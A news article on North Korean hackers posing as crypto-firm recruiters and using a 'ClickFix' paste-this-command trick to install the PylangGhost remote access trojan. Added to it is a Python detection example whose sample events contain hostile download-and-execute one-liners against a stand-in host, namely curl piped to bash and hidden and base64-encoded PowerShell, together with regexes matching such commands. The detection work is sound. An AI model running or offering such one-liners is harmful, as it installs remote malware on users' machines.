North Korean hackers tracked as “Famous Chollima” (activity also associated with the “Wagemole” name) have been using elaborate fake job interviews to distribute spyware and steal data from professionals in the cryptocurrency and blockchain industries. This campaign is part of a wider cyber offensive attributed to the notorious Lazarus Group, which has reportedly laundered billions of dollars in stolen cryptocurrency over the past year.
Threat intelligence research firm Cisco Talos revealed on Wednesday that Famous Chollima is deploying a new Python-based remote access trojan (RAT) dubbed “PylangGhost” in these attacks. The malware is functionally similar to the previously documented “GolangGhost” RAT, indicating a continued evolution of the group’s toolset.
Impersonating recruiters from Coinbase, Robinhood, Archblock, Parallel Studios, Uniswap
“Based on the advertised positions, it is clear that the Famous Chollima is broadly targeting individuals with previous experience in cryptocurrency and blockchain technologies,” a spokesperson for Cisco Talos stated in their recent blog post.
The modus operandi involves impersonating recruiters from prominent crypto companies such as Coinbase, Robinhood, Archblock, Parallel Studios, and Uniswap. Job applicants are lured to meticulously crafted, fake skill-testing websites, often built using the React framework. After completing a series of questions and providing personal details, victims are prompted to record a video for a supposed interview. When camera access is requested, the sites display deceptive error messages, instructing users to copy and paste malicious code onto their devices to “install necessary video drivers.”
‘ClickFix’ tactic
This “ClickFix” tactic exploits the victim’s instinct to fix the problem in front of them: the pasted “fix” is a command that downloads and runs the PylangGhost malware. Cisco Talos confirmed that separate versions of the malware exist for Windows and macOS. Once running, the RAT steals stored browser credentials, session cookies, and other sensitive data from a range of browser extensions, including crypto wallets such as MetaMask and Phantom and the 1Password password manager.
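The observable that survives every ClickFix variant is the pasted command itself: an interactive shell spawned from a Run dialog or terminal, whose command line both fetches something from the network and immediately executes it. The following is an added example, not code from Cisco Talos or from the PylangGhost report, showing how a detection engineer might score process-creation events for that pattern on both Windows and macOS. The events, hostnames and the `example.invalid` domain are constructed for the example; the field names mimic what an EDR agent or Sysmon Event ID 1 would record, and the treatment of PowerShell `-EncodedCommand` payloads goes beyond what the article describes (it is a common way such one-liners are obfuscated, so the example decodes them before matching).

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Commands or cmdlets that fetch content from the network.
DOWNLOADER = re.compile(
    r"\b(curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer)\b"
    r"|Net\.WebClient|certutil\s+-urlcache",
    re.IGNORECASE,
)
# Ways the fetched content gets executed in the same one-liner.
EXEC_SINK = re.compile(
    r"\|\s*(ba|z)?sh\b"                 # curl ... | bash
    r"|\|\s*python3?\b"                  # curl ... | python
    r"|\bpython(3|\.exe)?\s+\S+\.py\b"   # bundled interpreter running a script
    r"|\b(iex|Invoke-Expression|Start-Process)\b"
    r"|&\s*\$env:TEMP"                   # call operator on something in %TEMP%
    r"|\bchmod\s+\+x\b",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden\b", re.IGNORECASE)
# Assumption: a command pasted into Win+R runs with explorer.exe as parent;
# on macOS a pasted command runs under Terminal.app or iTerm.
INTERACTIVE_PARENT = re.compile(r"explorer\.exe$|/Terminal$|/iTerm2?$")
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_ps(command: str) -> str:
    """Base64 form PowerShell expects for -EncodedCommand (UTF-16LE). Used to build sample data."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def expand_encoded(cmdline: str) -> str:
    """Append the decoded payload of a PowerShell -EncodedCommand so the regexes can see it."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not really an encoded command (e.g. "ls -e foo")
    return cmdline + " " + decoded


@dataclass
class Finding:
    host: str
    image: str
    indicators: List[str] = field(default_factory=list)
    score: int = 0


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding when the command line both downloads and executes; None otherwise."""
    cmd = expand_encoded(event["cmdline"])
    indicators = []
    if DOWNLOADER.search(cmd):
        indicators.append("downloader")
    if EXEC_SINK.search(cmd):
        indicators.append("exec_sink")
    if HIDDEN_WINDOW.search(cmd):
        indicators.append("hidden_window")
    if INTERACTIVE_PARENT.search(event["parent_image"]):
        indicators.append("interactive_parent")
    # Download alone (a developer fetching a file) or execution alone is normal;
    # the ClickFix signal is the two together in one pasted command.
    if "downloader" in indicators and "exec_sink" in indicators:
        return Finding(event["host"], event["image"], indicators, len(indicators))
    return None


def scan(events: List[dict]) -> List[Finding]:
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample events (not telemetry from the Talos report).
SAMPLE_EVENTS = [
    {"host": "win-dev-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://example.invalid/drivers.zip -OutFile $env:TEMP\d.zip; '
                r'Expand-Archive $env:TEMP\d.zip $env:TEMP\d; & $env:TEMP\d\python.exe $env:TEMP\d\update.py"'},
    {"host": "mac-dev-02", "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash", "cmdline": 'bash -c "curl -fsSL https://example.invalid/fix.sh | bash"'},
    {"host": "win-dev-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -Command Get-ChildItem C:\Projects"},  # benign admin use
    {"host": "mac-dev-04", "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/usr/bin/curl", "cmdline": "curl -O https://example.invalid/release-notes.txt"},  # download only
    {"host": "win-dev-05", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + encode_ps(
         r"iwr https://example.invalid/v.zip -OutFile $env:TEMP\v.zip; "
         r"Expand-Archive $env:TEMP\v.zip $env:TEMP\v; Start-Process $env:TEMP\v\run.vbs")},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: score={f.score} {f.indicators}")
```

Only the three download-and-execute one-liners are reported; the plain `curl -O` and the `Get-ChildItem` command are ignored even though each matches one of the regexes on its own. In production the same logic belongs in the EDR query language rather than Python, and the `interactive_parent` indicator is the one worth tuning first, since a download-and-execute chain launched from the Run dialog is rarely legitimate on a developer workstation.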
While the primary focus of this campaign appears to be data exfiltration, the broader activities of Famous Chollima and the Lazarus Group are known to have significant financial motivations. US law enforcement agencies have previously stated that North Korea’s military generates billions of dollars through such illicit schemes, including direct cryptocurrency thefts and the funneling of salaries from North Korean IT workers infiltrated into legitimate companies.
PylangGhost campaign
Researchers at cybersecurity firms such as CrowdStrike have previously reported on the “Wagemole” tactic, in which North Korean actors use forged identities and AI-generated LinkedIn profiles to secure remote employment at Western tech firms. The intention is often dual-purpose: to generate revenue for the regime through salaries and to gain access that can be exploited for further espionage or direct cyberattacks.
While Cisco Talos has noted that most known victims in this specific PylangGhost campaign are located in India, and the overall impact remains limited based on open-source intelligence, the ongoing nature and sophistication of these attacks highlight a persistent threat to the global cryptocurrency ecosystem. Cybersecurity experts continue to urge vigilance, advising individuals and companies to thoroughly vet all job opportunities and to be highly suspicious of any requests to execute code or download software during an interview process.